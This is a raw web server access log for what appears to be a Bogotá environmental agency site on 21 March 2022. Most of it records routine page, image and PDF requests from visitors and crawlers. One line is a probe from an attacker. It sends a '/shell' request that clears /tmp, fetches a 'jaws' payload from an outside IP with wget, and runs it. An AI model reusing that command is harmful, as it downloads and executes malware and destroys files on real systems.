186.86.52.103 - - [21/Mar/2022:09:16:12 -0500] "GET /BLA/resoluciones/dlf/bg.gif HTTP/1.1" 200 54
186.86.52.103 - - [21/Mar/2022:09:16:18 -0500] "GET /BLA/resoluciones/dlf/dirup.png HTTP/1.1" 200 644
186.86.52.103 - - [21/Mar/2022:09:16:18 -0500] "GET /BLA/resoluciones/dlf/pdf.gif HTTP/1.1" 200 272
186.86.52.103 - - [21/Mar/2022:09:16:18 -0500] "GET /BLA/resoluciones/dlf/unknown.png HTTP/1.1" 200 266
186.86.52.103 - - [21/Mar/2022:09:16:18 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS+2021%2F HTTP/1.1" 200 329069
216.245.221.92 - - [21/Mar/2022:09:17:11 -0500] "HEAD / HTTP/1.1" 200 -
179.51.120.19 - - [21/Mar/2022:09:18:03 -0500] "GET /galeria/galeria/jquery.fancybox.css?v=2.1.5 HTTP/1.1" 200 4895
179.51.120.19 - - [21/Mar/2022:09:18:04 -0500] "GET /BLA/boletinlegal/js/jquery.scrollShow.js HTTP/1.1" 200 4586
179.51.120.19 - - [21/Mar/2022:09:18:05 -0500] "GET /galeria/galeria/jquery.fancybox.js?v=2.1.5 HTTP/1.1" 200 48706
179.51.120.19 - - [21/Mar/2022:09:18:05 -0500] "GET /galeria/carrusel/Carrusel/jquery.thumbnailScroller.css HTTP/1.1" 200 2066
179.51.120.19 - - [21/Mar/2022:09:18:05 -0500] "GET /galeria/carrusel/Carrusel/jquery-ui-1.8.13.custom.min.js HTTP/1.1" 200 10800
179.51.120.19 - - [21/Mar/2022:09:18:06 -0500] "GET /galeria/nivo-slider/demo/banner.html HTTP/1.1" 200 5446
179.51.120.19 - - [21/Mar/2022:09:18:06 -0500] "GET /galeria/carrusel/Carrusel/jquery.thumbnailScroller.js HTTP/1.1" 200 8157
179.51.120.19 - - [21/Mar/2022:09:18:06 -0500] "GET /galeria/nivo-slider/themes/default/default.css HTTP/1.1" 200 1569
179.51.120.19 - - [21/Mar/2022:09:18:06 -0500] "GET /galeria/nivo-slider/themes/pascal/pascal.css HTTP/1.1" 200 2258
179.51.120.19 - - [21/Mar/2022:09:18:06 -0500] "GET /galeria/nivo-slider/themes/orman/orman.css HTTP/1.1" 200 2152
179.51.120.19 - - [21/Mar/2022:09:18:06 -0500] "GET /galeria/nivo-slider/nivo-slider.css HTTP/1.1" 200 1507
179.51.120.19 - - [21/Mar/2022:09:18:06 -0500] "GET /galeria/nivo-slider/demo/style.css HTTP/1.1" 200 2222
179.51.120.19 - - [21/Mar/2022:09:18:06 -0500] "GET /galeria/nivo-slider/demo/scripts/jquery-1.7.1.min.js HTTP/1.1" 200 93868
179.51.120.19 - - [21/Mar/2022:09:18:07 -0500] "GET /galeria/nivo-slider/jquery.nivo.slider.pack.js HTTP/1.1" 200 11561
179.51.120.19 - - [21/Mar/2022:09:18:07 -0500] "GET /galeria/nivo-slider/demo/images/bannertortuga_optimized.jpg HTTP/1.1" 200 39066
179.51.120.19 - - [21/Mar/2022:09:18:07 -0500] "GET /galeria/nivo-slider/demo/images/Bannermujeresquereverdecen.jpg HTTP/1.1" 200 46558
179.51.120.19 - - [21/Mar/2022:09:18:07 -0500] "GET /galeria/nivo-slider/demo/images/bannertrafico_optimized.jpg HTTP/1.1" 200 42578
179.51.120.19 - - [21/Mar/2022:09:18:07 -0500] "GET /galeria/nivo-slider/demo/images/Bannersedeelectronica.jpg HTTP/1.1" 200 40383
179.51.120.19 - - [21/Mar/2022:09:18:07 -0500] "GET /galeria/nivo-slider/demo/images/bannerrutaesperanza.jpg HTTP/1.1" 200 55560
179.51.120.19 - - [21/Mar/2022:09:18:08 -0500] "GET /galeria/nivo-slider/demo/images/banneraire2021.jpg HTTP/1.1" 200 265101
179.51.120.19 - - [21/Mar/2022:09:18:08 -0500] "GET /galeria/nivo-slider/demo/images/Bannerplasticosseptiembre.jpg HTTP/1.1" 200 45633
179.51.120.19 - - [21/Mar/2022:09:18:08 -0500] "GET /galeria/nivo-slider/demo/images/bannerresiduoshospitalariosagosto.jpg HTTP/1.1" 200 36499
179.51.120.19 - - [21/Mar/2022:09:18:09 -0500] "GET /galeria/nivo-slider/demo/images/banneraccionpopularcrr68.jpg HTTP/1.1" 200 51887
179.51.120.19 - - [21/Mar/2022:09:18:09 -0500] "GET /galeria/nivo-slider/demo/images/banneraccionpopular.jpeg HTTP/1.1" 200 41707
179.51.120.19 - - [21/Mar/2022:09:18:09 -0500] "GET /galeria/nivo-slider/demo/images/bannerclases2021.jpg HTTP/1.1" 200 68230
179.51.120.19 - - [21/Mar/2022:09:18:10 -0500] "GET /galeria/nivo-slider/themes/default/loading.gif HTTP/1.1" 200 1737
179.51.120.19 - - [21/Mar/2022:09:18:10 -0500] "GET /galeria/nivo-slider/demo/images/4Simple_Slider.png HTTP/1.1" 200 11722
179.51.120.19 - - [21/Mar/2022:09:18:10 -0500] "GET /galeria/nivo-slider/demo/images/bannercapacitacionesbogota.jpg HTTP/1.1" 200 42416
179.51.120.19 - - [21/Mar/2022:09:18:10 -0500] "GET /galeria/nivo-slider/demo/images/Bannerenvases.jpg HTTP/1.1" 200 37316
179.51.120.19 - - [21/Mar/2022:09:18:11 -0500] "GET /galeria/nivo-slider/demo/images/Bannervirtualescanales.jpg HTTP/1.1" 200 174544
179.51.120.19 - - [21/Mar/2022:09:18:14 -0500] "GET /galeria/nivo-slider/themes/default/arrows.png HTTP/1.1" 200 824
179.51.120.19 - - [21/Mar/2022:09:18:14 -0500] "GET /galeria/nivo-slider/themes/default/bullets.png HTTP/1.1" 200 1281
207.46.13.209 - - [21/Mar/2022:09:18:20 -0500] "GET /bla/resoluciones/resoluciones%202014/0066.pdf HTTP/1.1" 200 754073
186.154.38.11 - - [21/Mar/2022:09:20:42 -0500] "GET /galeria/galeria/jquery.fancybox.css?v=2.1.5 HTTP/1.1" 200 4895
201.245.192.253 - - [21/Mar/2022:09:21:15 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 45028
216.245.221.92 - - [21/Mar/2022:09:22:11 -0500] "HEAD / HTTP/1.1" 200 -
186.194.160.13 - - [21/Mar/2022:09:22:51 -0500] "GET /galeria/galeria/jquery.fancybox.css?v=2.1.5 HTTP/1.1" 200 4895
201.245.192.253 - - [21/Mar/2022:09:22:06 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 45514
173.252.107.14 - - [21/Mar/2022:09:26:26 -0500] "GET /images/carro-carga-movilidad-4-febrero.jpg HTTP/1.1" 200 46258
157.55.39.218 - - [21/Mar/2022:09:26:42 -0500] "GET /bla/resoluciones/resoluciones%202014/1013.pdf HTTP/1.1" 200 463904
66.249.64.113 - - [21/Mar/2022:09:27:09 -0500] "-" 408 -
216.245.221.92 - - [21/Mar/2022:09:27:11 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [21/Mar/2022:09:27:42 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 115499
190.26.11.52 - - [21/Mar/2022:09:31:41 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202014/0509.pdf HTTP/1.1" 200 875437
201.245.192.253 - - [21/Mar/2022:09:31:15 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 45028
216.245.221.92 - - [21/Mar/2022:09:32:11 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [21/Mar/2022:09:32:01 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 45514
201.245.192.253 - - [21/Mar/2022:09:33:02 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 115499
181.237.162.52 - - [21/Mar/2022:09:34:12 -0500] "GET /forest/ HTTP/1.1" 200 12041
181.237.162.52 - - [21/Mar/2022:09:34:19 -0500] "POST /forest/index.php HTTP/1.1" 200 12268
207.46.13.209 - - [21/Mar/2022:09:36:42 -0500] "GET /bla/resoluciones/resoluciones%202014/1998.pdf HTTP/1.1" 200 461088
216.245.221.92 - - [21/Mar/2022:09:37:11 -0500] "HEAD / HTTP/1.1" 200 -
210.125.183.219 - - [21/Mar/2022:09:38:13 -0500] "GET /BLA/boletinlegal/norma_menu.ph HTTP/1.1" 404 1018
210.125.183.219 - - [21/Mar/2022:09:38:26 -0500] "GET /BLA/boletinlegal/norma_menu.ph HTTP/1.1" 404 1018
201.245.192.253 - - [21/Mar/2022:09:41:15 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 45028
216.245.221.92 - - [21/Mar/2022:09:42:11 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [21/Mar/2022:09:41:59 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 45514
45.83.64.9 - - [21/Mar/2022:09:45:54 -0500] "GET / HTTP/1.1" 200 319
45.83.66.128 - - [21/Mar/2022:09:45:55 -0500] "GET /favicon.ico HTTP/1.1" 200 7782
201.245.192.253 - - [21/Mar/2022:09:45:46 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 115499
216.245.221.92 - - [21/Mar/2022:09:47:11 -0500] "HEAD / HTTP/1.1" 200 -
31.13.103.14 - - [21/Mar/2022:09:49:34 -0500] "GET /images/pieza-grafica-arboles-12-febrero.jpg HTTP/1.1" 200 41257
40.77.167.46 - - [21/Mar/2022:09:49:55 -0500] "GET /bla/resoluciones/resoluciones%202014/1194.pdf HTTP/1.1" 200 533925
216.245.221.92 - - [21/Mar/2022:09:52:11 -0500] "HEAD / HTTP/1.1" 200 -
66.249.64.111 - - [21/Mar/2022:09:54:17 -0500] "-" 408 -
190.26.11.52 - - [21/Mar/2022:09:55:00 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202014/0988.pdf HTTP/1.1" 200 877341
216.245.221.92 - - [21/Mar/2022:09:57:11 -0500] "HEAD / HTTP/1.1" 200 -
128.14.209.162 - - [21/Mar/2022:09:58:24 -0500] "GET / HTTP/1.1" 200 319
201.245.192.253 - - [21/Mar/2022:09:57:48 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 115499
69.171.249.20 - - [21/Mar/2022:09:58:56 -0500] "GET /images/humedal-agua-lluvias-bogota-18-marzo.jpg HTTP/1.1" 200 146923
216.245.221.92 - - [21/Mar/2022:10:02:11 -0500] "HEAD / HTTP/1.1" 200 -
190.107.209.138 - - [21/Mar/2022:10:04:10 -0500] "GET /galeria/galeria/jquery.fancybox.css?v=2.1.5 HTTP/1.1" 200 4895
190.107.209.138 - - [21/Mar/2022:10:04:10 -0500] "GET /BLA/boletinlegal/js/jquery.scrollShow.js HTTP/1.1" 200 4586
190.107.209.138 - - [21/Mar/2022:10:04:10 -0500] "GET /galeria/galeria/jquery.fancybox.js?v=2.1.5 HTTP/1.1" 200 48706
187.220.197.229 - - [21/Mar/2022:10:04:21 -0500] "GET /shell?cd+/tmp;rm+-rf+*;wget+31.210.20.109/jaws;sh+/tmp/jaws HTTP/1.1" 404 1013
207.46.13.179 - - [21/Mar/2022:10:04:37 -0500] "GET /bla/resoluciones/resoluciones%202014/1764.pdf HTTP/1.1" 200 614092
34.90.227.196 - - [21/Mar/2022:10:04:43 -0500] "GET / HTTP/1.1" 200 319
201.245.192.253 - - [21/Mar/2022:10:06:09 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 213
216.245.221.92 - - [21/Mar/2022:10:07:11 -0500] "HEAD / HTTP/1.1" 200 -
103.178.236.102 - - [21/Mar/2022:10:07:36 -0500] "GET /dispatch.asp HTTP/1.1" 404 1018
216.245.221.92 - - [21/Mar/2022:10:12:11 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [21/Mar/2022:10:15:14 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 115789
216.245.221.92 - - [21/Mar/2022:10:17:11 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [21/Mar/2022:10:21:19 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 45314
216.245.221.92 - - [21/Mar/2022:10:22:11 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [21/Mar/2022:10:22:10 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 45804
40.77.167.46 - - [21/Mar/2022:10:26:20 -0500] "GET /bla/resoluciones/resoluciones%202014/1501.pdf HTTP/1.1" 200 307471
216.245.221.92 - - [21/Mar/2022:10:27:11 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [21/Mar/2022:10:27:49 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 115789
181.61.206.204 - - [21/Mar/2022:10:29:19 -0500] "GET /BLA/resoluciones/ HTTP/1.1" 200 13093
181.61.206.204 - - [21/Mar/2022:10:29:20 -0500] "GET /favicon.ico HTTP/1.1" 200 7782
181.61.206.204 - - [21/Mar/2022:10:29:24 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS+2021%2F HTTP/1.1" 200 329069
207.46.13.179 - - [21/Mar/2022:10:30:10 -0500] "GET /bla/resoluciones/resoluciones%202014/0321.pdf HTTP/1.1" 200 660783
207.46.13.179 - - [21/Mar/2022:10:30:12 -0500] "GET /bla/resoluciones/resoluciones%202021/1250.pdf HTTP/1.1" 200 511288
201.245.192.253 - - [21/Mar/2022:10:31:14 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 45314
216.245.221.92 - - [21/Mar/2022:10:32:11 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [21/Mar/2022:10:32:04 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 45804
201.245.192.253 - - [21/Mar/2022:10:32:12 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 115789
191.95.136.223 - - [21/Mar/2022:10:33:33 -0500] "GET /galeria/galeria/jquery.fancybox.css?v=2.1.5 HTTP/1.1" 200 4895
191.108.29.230 - - [21/Mar/2022:10:33:39 -0500] "GET /galeria/galeria/jquery.fancybox.css?v=2.1.5 HTTP/1.1" 200 4895
31.13.127.42 - - [21/Mar/2022:10:35:16 -0500] "GET /secretaria-de-ambiente-invita-a-comunidad-de-bosa-a-entregar-residuos-especiales-y-peligrosos.html?fbclid=IwAR35LhM4O9X8rw0rNGMQ8HuuYu9TusSh2rUvFi8h2J9K_lLonLf0feoxDtg HTTP/1.1" 200 992
191.156.66.179 - - [21/Mar/2022:10:36:25 -0500] "GET /asi-las-mujeres-que-reverdecen-cuidan-los-arboles-para-la-restauracion-ecologica-de-bogota.html HTTP/1.1" 200 911
216.245.221.92 - - [21/Mar/2022:10:37:11 -0500] "HEAD / HTTP/1.1" 200 -
66.249.64.109 - - [21/Mar/2022:10:39:00 -0500] "-" 408 -
181.142.178.71 - - [21/Mar/2022:10:39:30 -0500] "GET /appsia/controlador HTTP/1.1" 200 4799
181.142.178.71 - - [21/Mar/2022:10:39:31 -0500] "GET /appsia/scripts/validarIngreso.js HTTP/1.1" 200 851
181.142.178.71 - - [21/Mar/2022:10:39:31 -0500] "GET /appsia/css/estilos.css HTTP/1.1" 200 4804
181.142.178.71 - - [21/Mar/2022:10:39:31 -0500] "GET /appsia/images/logo_bogota_p.png HTTP/1.1" 200 14951
181.142.178.71 - - [21/Mar/2022:10:39:31 -0500] "GET /appsia/images/cabezoteHojaVida.png HTTP/1.1" 200 32493
181.142.178.71 - - [21/Mar/2022:10:39:31 -0500] "GET /favicon.ico HTTP/1.1" 200 7782
190.25.166.146 - - [21/Mar/2022:10:40:31 -0500] "GET /forest/ HTTP/1.1" 200 12041
31.13.115.10 - - [21/Mar/2022:10:40:35 -0500] "GET /operativo-de-control-y-sensibilizacion-para-verificar-la-correcta-disposicion-de-residuos-peligrosos-en-el-7-de-agosto.html?fbclid=IwAR0y33cTEdKz6ysy27odImvzPBl7xP8q0B0qIgqozfNYFrF0x3izcBdLwFc HTTP/1.1" 200 1042
190.25.166.146 - - [21/Mar/2022:10:40:40 -0500] "POST /forest/index.php HTTP/1.1" 200 12268
190.26.11.52 - - [21/Mar/2022:10:41:40 -0500] "GET /BLA/resoluciones/AUTOS%202021/0633.pdf HTTP/1.1" 200 3529638
216.245.221.92 - - [21/Mar/2022:10:42:11 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [21/Mar/2022:10:41:23 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 45314
201.245.192.253 - - [21/Mar/2022:10:42:07 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 115789
201.245.192.253 - - [21/Mar/2022:10:42:13 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 45804
181.56.174.224 - - [21/Mar/2022:10:45:21 -0500] "GET /galeria/galeria/jquery.fancybox.css?v=2.1.5 HTTP/1.1" 200 4895
66.249.64.109 - - [21/Mar/2022:10:45:27 -0500] "-" 408 -
191.156.66.179 - - [21/Mar/2022:10:45:57 -0500] "GET /asi-las-mujeres-que-reverdecen-cuidan-los-arboles-para-la-restauracion-ecologica-de-bogota.html HTTP/1.1" 200 911
191.156.66.179 - - [21/Mar/2022:10:46:38 -0500] "GET /asi-las-mujeres-que-reverdecen-cuidan-los-arboles-para-la-restauracion-ecologica-de-bogota.html HTTP/1.1" 200 911
190.26.11.52 - - [21/Mar/2022:10:46:51 -0500] "GET /BLA/resoluciones/ HTTP/1.1" 200 13093
190.26.11.52 - - [21/Mar/2022:10:46:53 -0500] "GET /BLA/resoluciones/index.php?dir=RESOLUCIONES+2014%2F HTTP/1.1" 200 330271
216.245.221.92 - - [21/Mar/2022:10:47:11 -0500] "HEAD / HTTP/1.1" 200 -
190.26.11.52 - - [21/Mar/2022:10:47:11 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS+2014%2F HTTP/1.1" 200 873085
190.26.11.52 - - [21/Mar/2022:10:47:13 -0500] "GET /BLA/resoluciones/dlf/unknown.png HTTP/1.1" 200 266
199.16.157.183 - - [21/Mar/2022:10:48:46 -0500] "-" 408 -
191.156.61.62 - - [21/Mar/2022:10:52:09 -0500] "GET /sipse/faces/faces/faces/faces/faces/faces/faces/faces/autenticacion.xhtml HTTP/1.1" 200 12499
191.156.61.62 - - [21/Mar/2022:10:52:09 -0500] "GET /sipse/js/disable_browser_buttons.js HTTP/1.1" 200 3230
191.156.56.13 - - [21/Mar/2022:10:52:09 -0500] "GET /sipse/css/custom_css_sg.css HTTP/1.1" 200 9694
191.156.57.26 - - [21/Mar/2022:10:52:09 -0500] "GET /sipse/js/funciones.js HTTP/1.1" 200 12592
191.156.56.13 - - [21/Mar/2022:10:52:09 -0500] "GET /sipse/css/custom_css_sg_prime_login.css HTTP/1.1" 200 443
191.156.56.13 - - [21/Mar/2022:10:52:10 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css;jsessionid=hEOkhAnKE6h7jdE9FaV0z+g0.undefined?ln=primefaces&v=4.0 HTTP/1.1" 200 542
191.156.61.62 - - [21/Mar/2022:10:52:09 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css;jsessionid=hEOkhAnKE6h7jdE9FaV0z+g0.undefined?ln=primefaces&v=4.0 HTTP/1.1" 200 53295
191.156.57.26 - - [21/Mar/2022:10:52:09 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 200 50058
191.156.56.13 - - [21/Mar/2022:10:52:10 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js;jsessionid=hEOkhAnKE6h7jdE9FaV0z+g0.undefined?ln=primefaces&v=4.0 HTTP/1.1" 200 105384
191.156.57.26 - - [21/Mar/2022:10:52:10 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js;jsessionid=hEOkhAnKE6h7jdE9FaV0z+g0.undefined?ln=primefaces&v=4.0 HTTP/1.1" 200 220526
191.156.56.13 - - [21/Mar/2022:10:52:10 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js;jsessionid=hEOkhAnKE6h7jdE9FaV0z+g0.undefined?ln=primefaces&v=4.0 HTTP/1.1" 200 87560
191.156.61.62 - - [21/Mar/2022:10:52:10 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js;jsessionid=hEOkhAnKE6h7jdE9FaV0z+g0.undefined?ln=primefaces&v=4.0 HTTP/1.1" 200 276924
191.156.57.26 - - [21/Mar/2022:10:52:11 -0500] "GET /sipse/faces/javax.faces.resource/images/ui-icons_898989_256x240.png?ln=primefaces-aristo HTTP/1.1" 200 5355
191.156.61.62 - - [21/Mar/2022:10:52:11 -0500] "GET /sipse/css/imagen/logoSDG.png HTTP/1.1" 200 53064
191.156.56.13 - - [21/Mar/2022:10:52:11 -0500] "GET /sipse/css/imagen/loginimg.png HTTP/1.1" 200 71635
216.245.221.92 - - [21/Mar/2022:10:52:11 -0500] "HEAD / HTTP/1.1" 200 -
191.156.56.13 - - [21/Mar/2022:10:52:11 -0500] "GET /sipse/faces/faces/faces/faces/faces/faces/faces/faces/index.xhtml HTTP/1.1" 200 677
191.156.56.13 - - [21/Mar/2022:10:52:12 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
191.156.56.13 - - [21/Mar/2022:10:52:12 -0500] "GET /favicon.ico HTTP/1.1" 200 7782
201.245.192.253 - - [21/Mar/2022:10:54:54 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 115789
216.245.221.92 - - [21/Mar/2022:10:57:11 -0500] "HEAD / HTTP/1.1" 200 -
181.62.149.79 - - [21/Mar/2022:10:59:36 -0500] "GET /BLA/resoluciones/ HTTP/1.1" 200 13093
181.62.149.79 - - [21/Mar/2022:10:59:39 -0500] "GET /BLA/resoluciones/index.php?dir=RESOLUCIONES+2011%2F HTTP/1.1" 200 744610
181.62.149.79 - - [21/Mar/2022:10:59:49 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202011/5449.pdf HTTP/1.1" 200 577942
191.95.19.236 - - [21/Mar/2022:11:00:38 -0500] "GET /galeria/galeria/jquery.fancybox.css?v=2.1.5 HTTP/1.1" 200 4895
157.55.39.218 - - [21/Mar/2022:11:01:30 -0500] "GET /bla/resoluciones/resoluciones%202021/4970.pdf HTTP/1.1" 200 400455
216.245.221.92 - - [21/Mar/2022:11:02:11 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [21/Mar/2022:11:04:20 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 213
216.245.221.92 - - [21/Mar/2022:11:07:11 -0500] "HEAD / HTTP/1.1" 200 -
207.46.13.179 - - [21/Mar/2022:11:07:13 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS+2012%2F HTTP/1.1" 200 270447
191.156.51.128 - - [21/Mar/2022:11:07:27 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
66.249.70.45 - - [21/Mar/2022:11:08:01 -0500] "-" 408 -
216.245.221.92 - - [21/Mar/2022:11:12:11 -0500] "HEAD / HTTP/1.1" 200 -
190.25.28.38 - - [21/Mar/2022:11:12:34 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202008/5309.pdf HTTP/1.1" 200 256532
201.245.192.253 - - [21/Mar/2022:11:14:53 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 115394
216.245.221.92 - - [21/Mar/2022:11:17:11 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [21/Mar/2022:11:21:15 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 44758
216.245.221.92 - - [21/Mar/2022:11:22:11 -0500] "HEAD / HTTP/1.1" 200 -
186.102.11.36 - - [21/Mar/2022:11:22:24 -0500] "GET /galeria/galeria/jquery.fancybox.css?v=2.1.5 HTTP/1.1" 200 4895
190.25.28.38 - - [21/Mar/2022:11:22:34 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202011/1754.pdf HTTP/1.1" 200 5933639
201.245.192.253 - - [21/Mar/2022:11:22:03 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 45652
190.25.28.38 - - [21/Mar/2022:11:23:25 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202011/5627.pdf HTTP/1.1" 200 729852
51.13.74.148 - - [21/Mar/2022:11:23:29 -0500] "-" 408 -
200.91.235.186 - - [21/Mar/2022:11:24:14 -0500] "GET /BLA/resoluciones/ HTTP/1.1" 200 13093
200.91.235.186 - - [21/Mar/2022:11:24:15 -0500] "GET /favicon.ico HTTP/1.1" 200 7782
200.91.235.186 - - [21/Mar/2022:11:24:18 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS+2019%2F HTTP/1.1" 200 339392
200.91.235.186 - - [21/Mar/2022:11:24:19 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS+2019%2F HTTP/1.1" 200 339392
200.91.235.186 - - [21/Mar/2022:11:24:22 -0500] "GET /BLA/resoluciones/AUTOS%202019/0032.pdf HTTP/1.1" 200 300316
190.25.28.38 - - [21/Mar/2022:11:24:54 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202012/1115.pdf HTTP/1.1" 200 1957133
200.91.235.186 - - [21/Mar/2022:11:25:08 -0500] "GET /BLA/resoluciones/AUTOS%202019/1615.pdf HTTP/1.1" 200 267831
190.25.28.38 - - [21/Mar/2022:11:26:10 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202015/3095.pdf HTTP/1.1" 200 1378153
201.245.192.253 - - [21/Mar/2022:11:26:09 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 115394
216.245.221.92 - - [21/Mar/2022:11:27:11 -0500] "HEAD / HTTP/1.1" 200 -
200.91.235.186 - - [21/Mar/2022:11:27:12 -0500] "GET /BLA/resoluciones/ HTTP/1.1" 200 13093
200.91.235.186 - - [21/Mar/2022:11:27:15 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS+2018%2F HTTP/1.1" 200 426655
200.91.235.186 - - [21/Mar/2022:11:27:44 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS+2018%2F HTTP/1.1" 200 426655
200.91.235.186 - - [21/Mar/2022:11:27:48 -0500] "GET /BLA/resoluciones/AUTOS%202018/0030.pdf HTTP/1.1" 200 265053
190.25.28.38 - - [21/Mar/2022:11:30:12 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202021/3920.pdf HTTP/1.1" 200 693914
201.245.192.253 - - [21/Mar/2022:11:31:14 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 44758
216.245.221.92 - - [21/Mar/2022:11:32:11 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [21/Mar/2022:11:32:04 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 45652
114.119.145.19 - - [21/Mar/2022:11:33:37 -0500] "-" 408 -
114.119.149.199 - - [21/Mar/2022:11:34:08 -0500] "-" 408 -
13.82.124.140 - - [21/Mar/2022:11:34:18 -0500] "\x16\x03\x03" 400 226
13.82.124.140 - - [21/Mar/2022:11:34:19 -0500] "\x16\x03\x03" 400 226
23.100.232.233 - - [21/Mar/2022:11:34:33 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202014/1792.pdf HTTP/1.1" 200 5184818
191.156.177.246 - - [21/Mar/2022:11:34:36 -0500] "GET /documents/10184/2325415/pieza-concurso-buenas-practicas-20-septiembre.jpg HTTP/1.1" 404 1030
114.119.132.187 - - [21/Mar/2022:11:34:40 -0500] "-" 408 -
200.91.235.186 - - [21/Mar/2022:11:35:01 -0500] "GET /BLA/resoluciones/ HTTP/1.1" 200 13093
200.91.235.186 - - [21/Mar/2022:11:35:04 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS+2010%2F HTTP/1.1" 200 272700
200.91.235.186 - - [21/Mar/2022:11:35:38 -0500] "GET /BLA/resoluciones/AUTOS%202010/5403.pdf HTTP/1.1" 200 1467681
66.249.70.47 - - [21/Mar/2022:11:36:43 -0500] "-" 408 -
216.245.221.92 - - [21/Mar/2022:11:37:11 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [21/Mar/2022:11:36:51 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 115394
69.63.184.119 - - [21/Mar/2022:11:41:44 -0500] "GET /images/carro-carga-movilidad-4-febrero.jpg HTTP/1.1" 200 46258
201.245.192.253 - - [21/Mar/2022:11:41:14 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 44758
186.85.145.15 - - [21/Mar/2022:11:42:06 -0500] "GET / HTTP/1.1" 200 4720
186.85.145.15 - - [21/Mar/2022:11:42:06 -0500] "GET /js/url.js HTTP/1.1" 404 1294
216.245.221.92 - - [21/Mar/2022:11:42:11 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [21/Mar/2022:11:41:59 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 45652
186.85.145.15 - - [21/Mar/2022:11:42:55 -0500] "POST /procesar.php HTTP/1.1" 200 1015
186.85.145.15 - - [21/Mar/2022:11:43:15 -0500] "GET /dia-mundial-del-agua-programese-para-participar-de-las-actividades-en-torno-a-esta-conmemoracion.html HTTP/1.1" 200 1039
191.156.191.232 - - [21/Mar/2022:11:43:18 -0500] "GET /dia-mundial-del-agua-programese-para-participar-de-las-actividades-en-torno-a-esta-conmemoracion.html HTTP/1.1" 200 1039
186.85.145.15 - - [21/Mar/2022:11:43:34 -0500] "GET /dia-mundial-del-agua-programese-para-participar-de-las-actividades-en-torno-a-esta-conmemoracion.html HTTP/1.1" 200 1039
186.85.145.15 - - [21/Mar/2022:11:43:34 -0500] "GET /images/D%C3%ADa%20Agua.jpeg HTTP/1.1" 404 1034
